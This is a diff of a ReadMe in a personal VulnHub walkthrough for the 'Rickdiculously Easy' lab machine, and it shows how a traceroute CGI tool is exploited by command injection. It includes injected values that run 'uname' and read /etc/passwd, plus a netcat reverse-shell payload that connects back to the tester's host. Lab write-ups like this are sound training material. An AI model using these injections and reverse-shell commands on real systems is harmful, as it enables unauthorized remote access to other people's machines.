PencilTester-01/VulnHubBoxes/Rickdiculously Easy/ReadMe.md

 I then take a look at `http://10.0.0.137/cgi-bin/tracertool.cgi`
 ![Optional Text](/Rickdiculously%20Easy/_resources/9ac3412d75fd4194b063f8a52debd39d.png)

-I look at `http://10.0.0.137/cgi-bin/tracertool.cgi` and after some testing I releazed it was vulnerable to command injection `1.2.3.4;uname -r` returned 4.11.8-300.fc26.x86_64 looks like the semicolon did the trick.
-I tried to get a reverse shell but didn't have anyluck so I printed the output of the `/etc/passwd`.
+I look at `http://10.0.0.137/cgi-bin/tracertool.cgi` and after some testing I realize it was vulnerable to command injection.
+I confirmed by running `1.2.3.4;uname -r` it returned 4.11.8-300.fc26.x86_64 looks like the semicolon did the trick.
+I was able to get a reverse shell but after playing around I didn't have much luck.
+I printed out the `/etc/passwd`.
 The cat command didn't work, but I encourage you to try, someone has a great since of humor!
 I used `nl` instead

-`;nl /etc/passwd`
+### Reverse Shell
+Local Machine Run: `nc -lvnp 4444`

+Go to `http://10.0.0.137/cgi-bin/tracertool.cgi` and in the dialog box put `; nc 10.0.0.186 4444 -e /bin/bash;` click trace

+You can also print out the `/etc/passwd` with the tracertool by placing `;nl /etc/passwd` in the dialog box

 ![Optional Text](/Rickdiculously%20Easy/_resources/6a8dee2210714497bd66728abccf025e.png)
 ```